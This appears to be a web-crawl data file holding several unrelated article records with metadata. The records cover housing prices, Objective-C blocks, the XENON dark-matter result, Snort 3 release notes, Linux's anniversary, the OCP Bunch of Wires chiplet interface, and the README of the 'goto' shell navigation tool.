Thus I see no reason to switch from my long-held estimate of a 2011-2012 timeframe for a bottom. Furthermore, even once housing does bottom, do not expect a V shaped recovery. Housing prices are likely to remain weak especially in real (inflation adjusted) terms for another decade. For a clue as what to expect, take a look at the period from 1991 to 2000 in the first Case-Shiller chart. Expect a similarly long "fat tail" once housing does bottom. If you are a believer in hyperinflation, then housing is a "sure thing". Indeed it was a "sure thing" last year and 5 years ago as well and we know how that turned out. Looking ahead, hyperinflation beliefs might still be very costly given the charts, history, and economic fundamentals suggest no such thing.

Mike "Mish" Shedlock
http://globaleconomicanalysis.blogspot.com
true
true
true
Inquiring minds have been asking for another housing update. Using the Japan Nationwide Land Prices model as my guide, here is how I have ca...
2024-10-12 00:00:00
2009-07-13 00:00:00
https://blogger.googleus…gb-176-10-10.png
null
blogspot.com
globaleconomicanalysis.blogspot.com
null
null
292,727
http://www.macresearch.org/cocoa-scientists-part-xxvii-getting-closure-objective-c
Cocoa for Scientists (Part XXVII): Getting Closure with Objective-C - MacResearch.org
Martina Nikolova
Last week, Chris Lattner — who manages the Clang, LLVM, and GCC groups at Apple — announced that work was well underway to bring ‘blocks’ to the GCC and Clang compilers. ‘So what?’, I hear you ask, ‘My kid has been using blocks since he was 9 months old.’ Fair point, but maybe not *these* blocks.

### A Demonstration of ‘Blocks’

Blocks, or *closures* as they are often called, have existed in other languages for quite some time. Ruby, for instance, is famous for them. They also exist in Python, which I’ll use here to demonstrate the principle. Take this Python code

```
def EvalFuncOnGrid(f, forceConst):
    for i in range(5):
        x = i*0.1
        print x, f(forceConst, x)

def QuadraticFunc(forceConst, x):
    return 0.5 * forceConst * x * x

def Caller():
    forceConst = 3.445
    EvalFuncOnGrid(QuadraticFunc, forceConst)

Caller()
```

This simple program begins with a call to the `Caller` function. The `Caller` function calls to the `EvalFuncOnGrid` function to evaluate the function passed, in this case `QuadraticFunc`, which represents a simple quadratic function. The result is the value of the quadratic function on a grid of points.

```
0.0 0.0
0.1 0.017225
0.2 0.0689
0.3 0.155025
0.4 0.2756
```

Unquestionably exciting stuff, but what I want to draw attention to is the extra data that was passed along with the function itself. The `QuadraticFunc` function takes two arguments: the coordinate (x), and a force constant. This force constant needs to be passed along with function, because the function itself has no way to store it. This may not seem like a big deal, but suppose now we want to reuse `EvalFuncOnGrid` to print values of a different type of function, one that does not have a force constant, and instead takes a wave number parameter. Hopefully you can see that passing ‘state’ for the function, in the form of data and parameters, is limiting the flexibility of our code. One viable solution would be to make `QuadraticFunc` a class, but that is a bit heavy-handed.
Besides, this solution would work for our own functions, but not for built-in functions, or functions from libraries. We need some way to pass state to `EvalFuncOnGrid`, so that it can use that state when evaluating the function. This is exactly what ‘blocks’ allow us to do. Here is the Python code rewritten to use a block:

```
def EvalFuncOnGrid(f):
    for i in range(5):
        x = i*0.1
        print x, f(x)

def Caller():
    const = 3.445
    def QuadraticFunc(x):
        return 0.5 * const * x * x
    EvalFuncOnGrid(QuadraticFunc)

Caller()
```

If you run it, you will find this code produces the same output as before. So what’s changed? You’ll note that the force constant has been removed from all argument lists, and no reference is made to it at all in `EvalFuncOnGrid`. This was a key objective: to have `EvalFuncOnGrid` be completely general, and work with any function. But the force constant must still be there, otherwise how does the quadratic function get evaluated?

You will have noticed that the `QuadraticFunc` function has been moved into the `Caller` function. The effect of this is that `QuadraticFunc` gets a copy of the stack of `Caller`, that is, it ‘inherits’ any variables and constants that are set in `Caller`. Because `const` is set, `QuadraticFunc` copies its value to its own stack, and can access it later in `EvalFuncOnGrid`. This is the essence of blocks: it is similar to passing a function argument, with the difference that the block has a copy of the stack from the scope where it was defined.

### Blocks in Objective-C

Chris Lattner’s announcement details how blocks will be used in C and Objective-C, and — in essence — it is similar to the Python example above.
Here is that example rewritten in the new C syntax:

```
void EvalFuncOnGrid( float(^block)(float) )
{
    int i;
    for ( i = 0; i < 5; ++i ) {
        float x = i * 0.1;
        printf("%f %f\n", x, block(x));
    }
}

void Caller(void)
{
    float forceConst = 3.445;
    EvalFuncOnGrid(^(float x){ return 0.5 * forceConst * x * x; });
}

void main(void)
{
    Caller();
}
```

(I’m not sure if this is 100% correct, because I haven’t tried to compile it yet, but it should at least give you the idea.)

The block syntax in C is very similar to the standard syntax for function pointers, but you use a caret (^) in place of the standard asterisk pointer (*). The block itself looks like a function definition, but is anonymous, and is embedded directly in the argument list. (Note that we named our ‘block’ in Python, but Python does also support anonymous functions.)

### Inside-Out Programming

Another way to think about closures/blocks is that they allow you to rewrite the inside of functions, such as `EvalFuncOnGrid` in the example. I like to think of this as ‘inside-out programming’: Traditionally, you call functions from outside, and pass them what they need to get the job done. With blocks, you get to pass in the guts of a function, effectively rewriting it on the fly.

### Why Blocks?

Why is all of this important, and why now? Well, as you are undoubtedly aware, there has been a vicious war raging the last few years, and it is only going to get worse before it gets better. That’s right — it’s the *War on Multicore*. Our chips no longer get faster, they just get more abundant, like the broomsticks in Disney’s Fantasia. Chipmakers just take existing designs, and chop them in half, and then in half again, and software developers are expected to do something useful with that extra ‘power’. It turns out that blocks could be a very useful weapon in the War on Multicore, because they allow you to create units of work, which each have their own copy of the stack, and don’t step on each others toes as a result.
What’s more, you can pass these units around like they are values, when in actual fact they contain a whole stack of values (pun intended), and executable code to perform some operation. In fact, blocks could be seen as a low-level form of `NSOperation`. For example, if you are parallelizing a loop, you could easily generate blocks for each of the iterations in the loop, and schedule them to run in parallel, in the same way that `NSOperationQueue` does this with instances of `NSOperation`. The advantage of blocks is that they are at a lower level, built into the language, and require much less overhead. Stay tuned, because Apple undoubtedly has some big things planned along these lines in Snow Leopard.
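The parallel-loop idea can be sketched in Python, the language used earlier in this article. This is my own illustration, not Apple's API: each closure captures its own copies of the values it needs, so the scheduled work items are self-contained units of work, loosely analogous to queuing blocks or `NSOperation` instances:

```python
# Sketch: closures as self-contained "units of work" scheduled across threads.
from concurrent.futures import ThreadPoolExecutor

def make_block(force_const, x):
    # The returned closure captures force_const and x from this scope,
    # much like a block copies values from the stack where it was defined.
    return lambda: 0.5 * force_const * x * x

# One block per loop iteration of the earlier grid evaluation.
blocks = [make_block(3.445, i * 0.1) for i in range(5)]

# Run the blocks in parallel; each one carries its own state.
with ThreadPoolExecutor() as pool:
    results = list(pool.map(lambda block: block(), blocks))

print(results)
```

The order of `results` matches the order the blocks were created in, since `map` preserves input order even when the work runs concurrently.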
true
true
true
Last week, Chris Lattner — who manages the Clang, LLVM, and GCC groups at Apple — announced that work was well underway to bring ‘blocks’ to the GCC and Clang compilers. ‘So what?’, I hear you ask, ‘My kid has been using blocks since he was 9 months old.’ Fair point, but maybe not these blocks. A Demonstration of
2024-10-12 00:00:00
2020-04-15 00:00:00
null
article
macresearch.org
Mac Research
null
null
6,024,026
http://blogs.law.harvard.edu/philg/2013/07/10/ode-to-flight-attendants/
null
null
null
false
false
false
null
null
null
null
null
null
null
null
null
23,571,546
https://www.businessinsider.com/dark-matter-experiment-possible-discovery-new-particle-physics-2020-6
An underground dark-matter experiment may have stumbled on the 'holy grail': a new particle that could upend the laws of physics
Morgan McFall-Johnsen
- A dark-matter experiment in an underground Italian lab may have discovered a new particle called the solar axion.
- If that's indeed what was detected, it would be the first direct evidence of a particle that shouldn't exist according to the known laws of physics.
- Alternatively, the data could also reveal new and surprising qualities of mysterious particles called neutrinos.
- Larger, more sensitive experiments in the next year will help scientists figure out whether they have indeed discovered a new particle.

An underground vat of liquid xenon in Italy may have just detected a new particle, born in the heart of the sun. If that's indeed what happened, it could upend laws of physics that have held fast for roughly 50 years. Researchers created the underground vat to search for dark matter, the elusive stuff that makes up 85% of all matter in the universe. Scientists know dark matter exists because they can measure the way its gravity affects faraway galaxies, but they've never detected it directly before. That's why an international group of researchers built the experiment at Italy's Gran Sasso National Laboratory. The vat is filled with 3.2 metric tons of liquid xenon, and those atoms interact with tiny particles when they collide. Each interaction, or "event," produces a flash of light and sheds electrons. In theory, this experiment is sensitive enough to detect interactions with particles of dark matter. In the latest version of the experiment, researchers expected the machine to detect 232 events within a year, based on known particles. But instead, it detected 285 events — 53 more than predicted. What's more, the amount of energy released in those extra events corresponded with the predicted energies of a yet-undiscovered particle called the solar axion: a type of particle that physicists have hypothesized exists but never observed.
"The hypothetical particle that could potentially explain the XENON data is one that is much too heavy to be dark matter, but could be created by the sun," Sean Carroll, a physicist at the California Institute of Technology who is not affiliated with XENON, told Business Insider. "If that were true, it would be hugely important — it would be a Nobel Prize-winning finding." It's also possible, however, that the interactions were anomalies, which pop up all the time in highly sensitive physics experiments like XENON.

## A new particle forged in the heart of the sun

Particle physicists study the smallest, most fundamental components of the universe: elementary particles like quarks and gluons, along with forces like gravity and electromagnetism. "Particle physics is an important part of modern physics, but it's also been stuck for a long while," Carroll said. "The last truly surprising discovery in particle physics was in the 1970s." That's when what's known as the Standard Model was established — a set of all the rules known to particle physics, which describe all the particles scientists have detected and how they interact with one another. "With it we can essentially explain every single thing we see in a particle-physics laboratory," Aaron Manalaysay, a dark-matter physicist at Lawrence Berkeley National Laboratory who is unaffiliated with XENON, told Business Insider. "It's probably the most accurate scientific model in history. But we also have good reason to think that it's not the most fundamental model of nature that exists." Physicists have hints that the model doesn't fully capture the way our universe behaves — their indirect observations of dark matter are among those hints. But they have yet to directly detect a particle that lies beyond the Standard Model. That's why it would be a big deal if XENON really has found a solar axion. "That would be the first concrete discovery of something beyond the Standard Model," Manalaysay said.
"That's kind of the holy grail right now of particle physics." Carroll agreed — but he added that the unprecedented nature of the potential discovery "is one of the reasons we think it's probably not there." In other words, without further evidence, nobody is celebrating yet. For now, several other theories could also explain the extra events XENON researchers saw.

## Misbehaving neutrinos could point to a 'new physics'

Another possible explanation for XENON's 53 extra events is that neutrinos — a subatomic particle with no electrical charge — could have driven the interactions. That would also defy the known laws of physics, though, since it would mean that neutrinos have a magnetic field much larger than what the Standard Model predicts. "That could point potentially to new physics beyond the Standard Model," Manalaysay said. It wouldn't be the first time neutrinos have broken the rules. According to the Standard Model, neutrinos shouldn't have mass — yet they do. The discovery that they have a sizable magnetic field would be yet another clue that something is missing from the model. "Neutrinos are really strange beasts, and we don't really understand them," Manalaysay said.

## Larger, more sensitive dark-matter experiments are coming

It's also possible that XENON's extra events didn't happen at all — though that's unlikely. The researchers calculated a chance of two in 10,000 that the detected events were due to random fluctuation. The signals may have come from other mundane particle interactions, however, making their explanation far less interesting than axions or neutrinos. The extra events could have come from tiny amounts of tritium, a radioactive isotope of hydrogen, decaying inside the vat. Argon isotopes would produce a similar effect, according to Manalaysay. "It wouldn't take much. It would just take a few atoms," he said, adding that a number of other things unknown to the researchers could also be responsible for the excess interactions.
"We've gone down this road before, where there's a little bit of an anomaly that you aren't expecting ... and then it goes away," Carroll said. "So this is clearly a place where you need to do a better experiment, and they're planning to do exactly that." A new generation of XENON-like experiments, currently in the works in the US and Europe, should help researchers study these extra events and determine which particles are causing them. That's because the new experiments will be larger and significantly more sensitive. "If this is real, we will absolutely see it in our next generation of experiments," Manalaysay said. He has worked with one such effort, called the Large Underground Xenon dark-matter experiment. "It's like you're going into a quieter and quieter room ... You start hearing new things you couldn't hear in a louder room." Whereas XENON picked up 53 unexplained events, the successor to LUX — called LUX-ZEPLIN — could detect 800, according to Manalaysay. Despite delays caused by the coronavirus, he added, new experiments will likely be running and returning results "within the next year." "It's like a teaser," he said. "The season's finale ends on a cliff-hanger, and you've got to wait until the next season."
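The quoted odds of "two in 10,000" map onto the sigma language physicists usually use for excesses. A minimal sketch of that conversion, assuming the conventional one-sided Gaussian tail and using only Python's standard library:

```python
from statistics import NormalDist

# The article's quoted chance that the excess is a random fluctuation.
p_fluctuation = 2 / 10_000

# Convert to a one-sided Gaussian significance (the usual convention
# for an excess of events).
z = NormalDist().inv_cdf(1 - p_fluctuation)
print(f"{z:.1f} sigma")   # about 3.5 sigma
```

Roughly 3.5 sigma is interesting but well short of the 5-sigma bar particle physicists conventionally require before claiming a discovery, which is consistent with the cautious tone of the researchers quoted above.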
true
true
true
If researchers have detected an axion particle forged inside the sun, the potentially "Nobel Prize-winning finding" would defy the laws of physics.
2024-10-12 00:00:00
2020-06-18 00:00:00
https://i.insider.com/5eeaaaa94dca683cb90f7db4?width=1200&format=jpeg
article
businessinsider.com
Insider
null
null
8,865,258
http://bytemaster.bitshares.org/article/2015/01/11/Introducing-SafeBot/?r=jaran
null
null
null
false
false
false
null
null
null
null
null
null
null
null
null
34,937,820
https://blog.snort.org/2023/01/snort-v31530-is-now-available.html
Snort v3.1.53.0 is now available!
Twillowkins
The SNORTⓇ team recently released a new version of Snort 3 on Snort.org and the Snort 3 GitHub. Snort 3.1.53.0 contains several new features and bug fixes. Users are encouraged to update as soon as possible, or upgrade to Snort 3 if they have not already done so. Here's a rundown of all the changes and new features in this latest version of Snort 3:

- appid: publish tls host set in eve process event handler only when appid discovery is complete
- detection: show search algorithm configured
- file_api: handling filedata in multithreading context
- flow: add stream interface to get parent flow from child flow
- memory: added memusage pegs
- memory: fix unit test build w/o reg test

Snort 3 is the next generation of the Snort Intrusion Prevention System. The GitHub page will walk users through what Snort 3 has to offer and guide users through the steps of getting set up—from download to demo. Users unfamiliar with Snort should start with the Snort Resources page and the Snort 101 video series. You can subscribe to the newest rule detection functionality from Talos for as low as $29.99 a year with a personal account. See our business pricing as well here. Make sure to stay up to date to catch the most emerging threats.
true
true
true
The SNORTⓇ team recently released a new version of Snort 3 on Snort.org and the Snort 3 GitHub . Snort 3.1.53.0 contains several new featu...
2024-10-12 00:00:00
2023-01-30 00:00:00
null
null
snort.org
blog.snort.org
null
null
14,309,930
https://medium.com/21st-century-architectures/cost-aware-architectures-8c07ed78d4d4
null
null
null
false
false
false
null
null
null
null
null
null
null
null
null
8,226,137
http://www.theregister.co.uk/2014/08/26/linux_turns_23_and_linus_torvalds_celebrates_as_only_he_can/
Linux turns 23 and Linus Torvalds celebrates as only he can
Simon Sharwood
# Linux turns 23 and Linus Torvalds celebrates as only he can

## No, not with swearing, but by controlling the release cycle

Linus Torvalds issued Linux 3.17-rc2 on Monday. Linux-loving readers will note that releasing on a Monday is not Torvalds' style. He usually releases on Sundays. The reason for the change is detailed on the Linux kernel mailing list as follows:

“So I deviated from my normal Sunday schedule partly because there wasn't much there (I blame the KS and LinuxCon), but partly due to sentimental reasons: Aug 25 is the anniversary of the original Linux announcement ("Hello everybody out there using minix"), so it's just a good day for release announcements.”

Which made yesterday the 23rd birthday of Linux. The release candidate itself is unremarkable: Torvalds says it is “All over the place … and nothing in particular stands out.” If you're really keen to have a look, Torvalds says it offers “60% drivers (drm, networking, hid, sound, PCI), with 15% filesystem updates (cifs, isofs, nfs), 10% architectures (mips, arm, some minor x86 stuff) and the rest is 'misc' (kernel, networking, documentation).” ®
true
true
true
No, not with swearing, but by controlling the release cycle
2024-10-12 00:00:00
2014-08-26 00:00:00
null
article
theregister.com
The Register
null
null
633,120
http://www.washingtonpost.com/wp-dyn/content/story/2009/05/15/ST2009051503494.html
null
null
null
false
false
false
null
null
null
null
null
null
null
null
null
1,106,401
http://nikgregory.com/2010/02/of-amazon-and-ebooks/
null
null
null
true
true
false
null
2024-10-12 00:00:00
null
null
null
null
null
null
null
7,198,739
http://www.winehq.org/announce/1.7.12
null
null
null
false
false
false
null
null
null
null
null
null
null
null
null
2,715,908
http://www.geek.com/articles/games/coming-soon-to-a-jailbroken-ipad-near-you-side-by-side-app-multitasking-20110630/
null
null
null
false
false
false
null
null
null
null
null
null
null
null
null
30,676,873
https://www.imdb.com/title/tt10811166/ratings
The Kashmir Files (2022) - Ratings - IMDb
null
The Kashmir Files: IMDb rating (weighted to help keep it reliable) 8.6/10 from 575K user ratings. Unweighted mean: 9.4. Countries with the most ratings: India, United States, United Kingdom, Bangladesh, Canada.
true
true
true
The Kashmir Files (2022) - Movies, TV, Celebs, and more...
2024-10-12 00:00:00
2024-10-12 00:00:00
https://m.media-amazon.c…Mjpg_UX1000_.jpg
video.movie
imdb.com
IMDb
null
null
162,639
http://blog.businessofsoftware.org/2008/04/business-of-sof.html
null
null
null
false
false
false
null
null
null
null
null
null
null
null
null
21,968,724
https://fuse.wikichip.org/news/3199/ocp-bunch-of-wires-a-new-open-chiplets-interface-for-organic-substrates/
OCP Bunch of Wires: A New Open Chiplets Interface For Organic Substrates
David Schor
# OCP Bunch of Wires: A New Open Chiplets Interface For Organic Substrates

Previously we covered the Open Compute Project’s latest endeavor – ODSA – an industry-wide collaboration for the open standardization of chiplets. The group is pursuing the standardization of the entire architecture interface stack so that chiplets from different sources could seamlessly communicate with one another. Currently, there is a large focus in the industry on advanced packaging. Silicon interposers and silicon bridges are making their way to mainstream products. As advanced packaging makes its way to more products, new interfaces are being developed to more easily link dies together. TSMC is introducing its LIPINCON interconnects and Intel has a number of interconnects including AIB and MDIO. The common theme among all those interconnects is that they are designed to go over silicon – and silicon is expensive. Even silicon bridges are significantly more expensive than a standard organic substrate. The OCP ODSA group is making the case that, at least for some designs, a good old organic substrate works just fine. There is just one problem: there doesn’t actually exist a modern inter-die interconnect specifically designed for a standard organic-substrate-based multi-chip package with decent throughput and power consumption. The ODSA group wants to step in here and help. In addition to supporting existing open standards such as AIB, the group wanted to enable support for cheaper packages that do not rely on silicon. There are some good arguments for using multi-chip packages: they are cheap, mature, and highly reliable. Additionally, there is generally better screening for KGDs and, because the dies can be spaced farther apart, they exhibit slightly better heat dissipation characteristics. The major downside to all of this is that traces between chips are generally much wider, yielding lower wire density. This, however, at least in theory, could be compensated for with 6x-10x higher throughput.
This is where the Bunch of Wires (BoW) comes in – and yes, that is its actual technical name! This is a brand new interface by the OCP ODSA group designed to address the interface void for organic substrates. Therefore the specs, testing, validation, and characterization for BoW have all been done on organic substrates. BoW has some fairly aggressive performance targets based on industry customer surveys for what they were looking for in an interface. In terms of throughput efficiency, they are going for 100 Gbps/mm to 1 Tbps/mm (die edge) with an energy efficiency of 1 pJ/bit to 0.5 pJ/bit – numbers that rival those of current-generation silicon interposers. Since dies are spaced apart, a trace length of 25 mm to 50 mm is required with a latency of sub-5ns. The group had a number of additional requirements, such as that it has to be relatively simple to design, especially on advanced nodes such as 7 nm, 5 nm, and 3 nm. The final requirement is that it uses a single supply voltage. In other words, it needs to use the same supply that the logic uses (i.e., a standard Vdd range of around 0.7V-0.9V) for maximum process compatibility. A simple unterminated lane (a driver, an inverter, and a latch) implementation can already get up to around 5 Gbps/wire with wires up to 10 mm in length. With a simple modulation such as NRZ it’s possible to get it up to 50 Gbps or even double that rate with PAM4. The problem with PAM4 is the undesirably high error rates, necessitating forward error correction (FEC). This, in turn, increases both the power consumption of the links and the latency. For the Bunch of Wires, the bandwidth of NRZ is doubled by using simultaneous bidirectional terminated lines. In other words, instead of using the bandwidth in just one direction over the transmission line, BoW signals are transmitted bidirectionally on the interconnection to double the effective data rate to around 100 Gbps without FEC.
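The per-wire rate ladder just described is plain arithmetic; the sketch below simply restates the article's ballpark figures (5 Gbps unterminated, 50 Gbps terminated NRZ, and a 2x factor from either PAM4 or BoW's simultaneous bidirectional signaling), not a channel model:

```python
# Ballpark per-wire throughput for the signaling options discussed above.
# Figures are the article's round numbers, not a channel model.
unterminated_gbps = 5         # simple driver/inverter/latch lane, <10 mm
nrz_gbps = 50                 # NRZ over a terminated line
pam4_gbps = 2 * nrz_gbps      # PAM4 doubles NRZ, but its error rate needs FEC
bow_gbps = 2 * nrz_gbps       # BoW: transmit in both directions at once, no FEC

print(bow_gbps)               # 100 Gbps effective per wire
```

The point of the comparison is that BoW reaches the same 2x factor as PAM4 without paying the FEC power and latency tax.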
A silicon proof of concept has been fabricated on GlobalFoundries' 14-nanometer process which reaches 28 Gbps in each direction for an effective bidirectional bandwidth of 56 Gbps/port. At the current target supply voltage of 0.75 V they are reporting a power efficiency of 0.7 pJ/bit. (Note that AQLink is the ultra-short reach SerDes by Aquantia).

#### BoW Proposal

For the Bunch of Wires, a couple of flavors are being proposed – BoW-Base, BoW-Fast, and BoW-Turbo. BoW-Base is the base implementation that has a range of under 10 mm. This is a very simple implementation with rates up to 4 GT/s using unterminated lanes. BoW-Fast (also called Plus) is a terminated version of BoW-Base but is still unidirectional. This implementation targets rates of up to 16 GT/s. Finally, the BoW-Turbo version uses the same data rate as BoW-Fast but utilizes simultaneous bidirectional links to double the effective rate to 32 GT/s/wire. Both BoW-Fast and BoW-Turbo have a maximum trace length of up to 50 mm. Note that regardless of the BoW option chosen, the rate is capped at 16 GT/s in order to reduce the complexity of design and ease of porting. It’s worth pointing out that all three implementations are actually backward-compatible. BoW-Turbo can always communicate with BoW-Turbo by default. In order to communicate with a chiplet that uses BoW-Fast, it’s only necessary to disable a single transmit/receive per lane, which makes it fall back to unidirectional operation. Likewise, to go from BoW-Fast to BoW-Base, it’s only necessary to disconnect the line termination. The BoW bump building block slice comprises 16 single-ended data bumps, differential clocks, a mode bump, and an optional error correction bump. A slice is 1170 µm x 320 µm (~0.4 mm²), assuming a 130 µm bump pitch. If we do some back-of-the-envelope calculations, under BoW-Base, a single BoW slice has an aggregated bandwidth of 64 Gbps, BoW-Fast quadruples this to 256 Gbps, and BoW-Turbo doubles that rate to 512 Gbps.
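The back-of-the-envelope slice numbers are easy to reproduce; a quick sketch using the figures above (16 data bumps per slice, a ~0.4 mm² slice, and treating x GT/s per wire as x Gbps per bump):

```python
# Aggregate bandwidth of one BoW slice per flavor, from the article's figures.
DATA_BUMPS = 16                 # single-ended data bumps per slice
SLICE_AREA_MM2 = 0.4            # 1170 µm x 320 µm at a 130 µm bump pitch

base_gbps = DATA_BUMPS * 4      # BoW-Base:  4 GT/s per wire  ->  64 Gbps
fast_gbps = DATA_BUMPS * 16     # BoW-Fast: 16 GT/s per wire  -> 256 Gbps
turbo_gbps = 2 * fast_gbps      # BoW-Turbo: bidirectional    -> 512 Gbps

areal_density = turbo_gbps / SLICE_AREA_MM2   # ~1280 Gbps/mm²
print(base_gbps, fast_gbps, turbo_gbps, round(areal_density))
```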
That works out to 1280 Gbps/mm², not bad for an organic substrate. Of course, multiple BoW slices can be combined to increase throughput per die edge. It’s possible to stack up to around four slices on top of each other.

So what about the control communication of BoW? We pointed out earlier that there is only a single mode bump. Instead of adding additional bumps for the sideband control/calibration state, a simple shared open-drain bump technique is used. Simply toggle the mode bit to switch between data and control. For one of the sides to go into calibration mode, the mode bump is pulled down. Otherwise, the data bumps are assumed to be in standard data mode.

#### Chiplet Interconnect Comparison

On GlobalFoundries' 14-nanometer process, current proofs of concept show an energy efficiency of around 0.7 pJ/bit. They estimate this can be reduced to 0.5 pJ/bit on a 7-nanometer node.

| Current Chiplet-based Demos | | | | |
|---|---|---|---|---|
| Company | Intel | AMD | TSMC | OCP ODSA |
| Chip | Stratix 10 | Zen | VLSI Demo | This |
| Packaging Technology | EMIB | MCP | CoWoS | MCP |
| Channel | 1 mm | N/A | 500 µm | N/A |
| Chiplet I/O Bumps | 55 µm | 150 µm | 40 µm | 130 µm |
| Interconnect | AIB | IF | LIPINCON | BoW-Turbo |
| Data Rate | 2 GT/s | 10.6 GT/s | 8 GT/s | 32 GT/s |
| Power | 1.2 pJ/bit | 2 pJ/bit | 0.56 pJ/bit | 0.7 pJ/bit |

It’s worth highlighting that BoW is designed for standard multi-chip packages with a bump pitch of around 130 microns, yielding a bump density of just 68 bumps/mm². More recently, Intel unveiled the MDIO interconnect which has a much more aggressive shoreline bandwidth density. Nonetheless, BoW makes up for it with higher data rates. The final result is that, against the current generation of interconnects, with the ability to stack up to four slices, BoW provides slightly lower areal bandwidth density but higher shoreline bandwidth density.
| Current Chiplet-based Interconnects | | | | |
|---|---|---|---|---|
| Company | Intel | Intel | TSMC | OCP ODSA |
| Package | EMIB | EMIB/ODI | CoWoS | MCP |
| Interconnect | AIB Gen1 | MDIO Gen1 | LIPINCON | BoW-Turbo (3 slices) |
| Data Rate | 2 GT/s | 5.4 GT/s | 8 GT/s | 16 GT/s |
| Shoreline BW Density | 504 Gbps/mm | 1600 Gbps/mm | 536 Gbps/mm | 1280 Gbps/mm |
| PHY Power | 0.85 pJ/bit | 0.5 pJ/bit | 0.5 pJ/bit | 0.7 pJ/bit (14nm measured), 0.5 pJ/bit (7nm estimate) |
| Areal BW Density | 150 GBps/mm² | 198 GBps/mm² | 198 GBps/mm² | 148 GBps/mm² |
true
true
true
A look at a Bunch of Wires, a new open standard chiplets interconnect being proposed by the OCP ODSA group intended for standard organic multi-chip packages as a cheaper alternative to silicon interposers and bridges.
2024-10-12 00:00:00
2020-01-05 00:00:00
https://fuse.wikichip.or…/bow-demo-fi.jpg
article
wikichip.org
WikiChip Fuse
null
null
9,763,982
https://vimeo.com/131526075
null
null
null
false
false
false
null
null
null
null
null
null
null
null
null
29,544,035
https://readme.security/how-to-hack-a-satellite-209bc9b0a0a0?gi=bef659057f72
null
null
null
false
false
false
null
null
null
null
null
null
null
null
null
29,947,442
https://sad.pub/
null
null
null
false
false
false
null
null
null
null
null
null
null
null
null
16,770,826
https://github.com/iridakos/goto
GitHub - iridakos/goto: Alias and navigate to directories with tab completion in Linux
Iridakos
A shell utility allowing users to navigate to aliased directories supporting auto-completion 🐾

Users register directory aliases, for example:

`goto -r dev /home/iridakos/development`

and then `cd` to that directory with:

`goto dev`

`goto` comes with a nice auto-completion script so that whenever you press the `tab` key after the `goto` command, bash or zsh prompts with suggestions of the available aliases:

```
$ goto <tab>
bc /etc/bash_completion.d
dev /home/iridakos/development
rubies /home/iridakos/.rvm/rubies
```

Clone the repository and run the install script as super user or root:

```
git clone https://github.com/iridakos/goto.git
cd goto
sudo ./install
```

Copy the file `goto.sh` somewhere in your filesystem and add a line in your `.zshrc` or `.bashrc` to source it. For example, if you placed the file in your home folder, all you have to do is add the following line to your `.zshrc` or `.bashrc` file:

`source ~/goto.sh`

A formula named `goto` is available for the bash shell in macOS:

`brew install goto`

`echo -e "\$include /etc/inputrc\nset colored-completion-prefix on" >> ~/.inputrc`

**Note:**

- you need to restart your shell after installation
- you need to have the bash completion feature enabled for bash in macOS (see this issue); you can install it with `brew install bash-completion` in case you don't have it already

- Change to an aliased directory
- Register an alias
- Unregister an alias
- List aliases
- Expand an alias
- Cleanup
- Help
- Version
- Extras
- Troubleshooting

To change to an aliased directory, type:

`goto <alias>`

`goto dev`

To register a directory alias, type:

`goto -r <alias> <directory>` or `goto --register <alias> <directory>`

`goto -r blog /mnt/external/projects/html/blog` or `goto --register blog /mnt/external/projects/html/blog`

`goto` **expands** the directories, hence you can easily alias your current directory with:

`goto -r last_release .`

and it will automatically be aliased to the whole path.
- Pressing the `tab` key after the alias name, you have the default directory suggestions by the shell.

To unregister an alias, use:

`goto -u <alias>` or `goto --unregister <alias>`

```
goto -u last_release
```

or

```
goto --unregister last_release
```

Pressing the `tab` key after the command (`-u` or `--unregister`), the completion script will prompt you with the list of registered aliases for your convenience.

To get the list of your currently registered aliases, use:

`goto -l` or `goto --list`

To expand an alias to its value, use:

`goto -x <alias>` or `goto --expand <alias>`

`goto -x last_release` or `goto --expand last_release`

To cleanup the aliases from directories that are no longer accessible in your filesystem, use:

`goto -c` or `goto --cleanup`

To view the tool's help information, use:

`goto -h` or `goto --help`

To view the tool's version, use:

`goto -v` or `goto --version`

To first push the current directory onto the directory stack before changing directories, type:

`goto -p <alias>` or `goto --push <alias>`

To return to a pushed directory, type:

`goto -o` or `goto --pop`

This command is equivalent to `popd`, but within the `goto` command.

From version **2.x and after**, the `goto` DB file is located in the `$XDG_CONFIG_HOME` or in the `~/.config` directory under the name `goto`. If you updated from version **1.x** to **2.x or newer**, you need to move this file, which was previously located at `~/.goto`. *Note that the new file is not hidden, it does not start with a dot.*

In case you get such an error, you need to load the `bashcompinit`.
Append this to your `.zshrc` file:

```
autoload bashcompinit
bashcompinit
```

- ~~Test on macOS extensively~~
- Write tests

To contribute:

- Fork it ( https://github.com/iridakos/goto/fork )
- Create your feature branch ( `git checkout -b my-new-feature` )
- Commit your changes ( `git commit -am 'Add some feature'` )
- Push to the branch ( `git push origin my-new-feature` )
- Make sure that the script does not have errors or warnings on ShellCheck
- Create a new Pull Request

This tool is open source under the MIT License terms.
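To make the registry idea concrete, here is a toy re-implementation of the register/expand/jump cycle as plain bash functions. This is a hypothetical sketch (the DB path, flat "alias path" file format, and function names are invented for illustration), not the project's actual code, which also handles completion, validation, and cleanup:

```shell
#!/usr/bin/env bash
# Toy alias registry in the spirit of goto: one "alias path" pair per line.
DB="${GOTO_DEMO_DB:-/tmp/goto_demo_db}"

register() { printf '%s %s\n' "$1" "$2" >> "$DB"; }         # like `goto -r`
expand()   { awk -v a="$1" '$1 == a { print $2 }' "$DB"; }  # like `goto -x`
jump()     { cd "$(expand "$1")" || return 1; }             # like `goto <alias>`

: > "$DB"            # start with an empty registry
register dev /tmp
expand dev           # prints /tmp
```

The real `goto` additionally expands relative paths to absolute ones at registration time (which is why `goto -r last_release .` works) and wires the alias list into tab completion.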
true
true
true
Alias and navigate to directories with tab completion in Linux - iridakos/goto
2024-10-12 00:00:00
2018-03-04 00:00:00
https://opengraph.githubassets.com/720c501c7265ba4bd0fa0367b4d0588aa76a3f8e517f528e7c46426077d43e24/iridakos/goto
object
github.com
GitHub
null
null
38,366,695
https://www.inkandswitch.com/embark/
null
null
null
true
true
true
null
2024-10-12 00:00:00
null
null
null
null
null
null
null